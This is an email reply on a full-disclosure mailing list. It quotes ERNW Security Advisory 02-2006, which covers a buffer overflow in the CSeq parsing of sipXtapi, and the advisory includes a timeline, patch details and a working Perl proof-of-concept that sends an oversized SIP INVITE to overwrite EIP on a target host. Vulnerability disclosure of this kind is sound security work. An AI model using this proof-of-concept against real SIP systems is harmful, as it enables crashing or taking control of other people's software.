is there an official notification from sipX?<br>I dont see any mention to this vulnerability in the changelog<br><br><br><div><span class="gmail_quote">On 7/10/06, <b class="gmail_sendername"><a href="mailto:mozilla@ids-guide.de">
mozilla@ids-guide.de</a></b> <<a href="mailto:mozilla@ids-guide.de">mozilla@ids-guide.de</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
ERNW Security Advisory 02-2006<br><br>Buffer Overflow in SIP Foundry's SipXtapi<br><br>Author:<br>Michael Thumann <mthumann[at]ernw.de><br>Homepage: <a href="http://www.ernw.de">www.ernw.de</a><br><br>1. Summary:<br>
The sipXtapi library from sip foundry contains a buffer overflow when parsing the CSeq field.<br>This flaw can be used by an attacker to gain control over EIP and execute arbitrary code.<br><br>2. Severity : Critical<br>
<br>3. Products affected<br>- sipXtapi: all version compiled before 24 of march 2006<br>- PingTel products<br>- AOL Triton<br><br>4. Patch Availability :<br>A patch is available within the source tree and the affected products of PingTel and AOL
<br>have beed updated.<br><br>5. Details<br>Sending a CSeq field value greater than 24 bytes triggers the buffer ovlerflow condition.<br><br>6. Solution<br>Update the affected products to the actual version.<br><br>7. Time-Line
<br>20 Mar 2006: Vulnerability reported to vendor<br>20 Mar 2006: Answer from vendor<br>24 Mar 2006: Patch available<br>10 July 2006: Public Disclosure<br><br>8. Exploit<br>#!/usr/bin/perl<br># PoC Exploit By <a href="mailto:mthumann@ernw.de">
mthumann@ernw.de</a><br># Remote Buffer Overflow in sipXtapi<br><br>use IO::Socket;<br>#use strict;<br><br><br>print "sipXtapi Exploit by Michael Thumann \n\n";<br><br>if (not $ARGV[0]) {<br> print "Usage:
sipx.pl <host>\n";<br>exit;}<br><br>$target=$ARGV[0];<br>my $source ="<a href="http://127.0.0.1">127.0.0.1</a>";<br>my $target_port = 5060;<br>my $user ="bad";<br>my $eip="\x41\x41\x41\x41";
<br>my $cseq =<br>"\x31\x31\x35\x37\x39\x32\x30\x38".<br>"\x39\x32\x33\x37\x33\x31\x36\x31".<br>"\x39\x35\x34\x32\x33\x35\x37\x30".<br>$eip;<br>my $packet =<<END;<br>INVITE sip:user\@$source SIP/2.0\r
<br>To: <sip:$target:$target_port>\r<br>Via: SIP/2.0/UDP $target:3277\r<br>From: "moz"<sip:$target:3277>\r<br>Call-ID: 3121$target\r<br>CSeq: $cseq\r<br>Max-Forwards: 70\r<br>Contact: <sip:$source:5059>\r
<br>\r<br>END<br><br>print "Sending Packet to: " . $target . "\n\n";<br>socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));<br>my $ipaddr = inet_aton($target);<br>my $sendto = sockaddr_in($target_port,$ipaddr);
<br>send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";<br>print "Done.\n";<br><br>9. Thanks<br>We would like to thank the guys from sip foundry for working together on this issue in a professional and
<br>responsible way.<br><br>10. Disclaimer<br> The informations in this advisory are provided "AS IS" without warranty<br>of any kind. In no event shall the authors be liable for any damages<br>whatsoever including direct, indirect, incidental, consequential,
<br>loss of business profits or special damages due to the misuse of any<br>information provided in this advisory.<br><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter:
<a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote>
</div><br>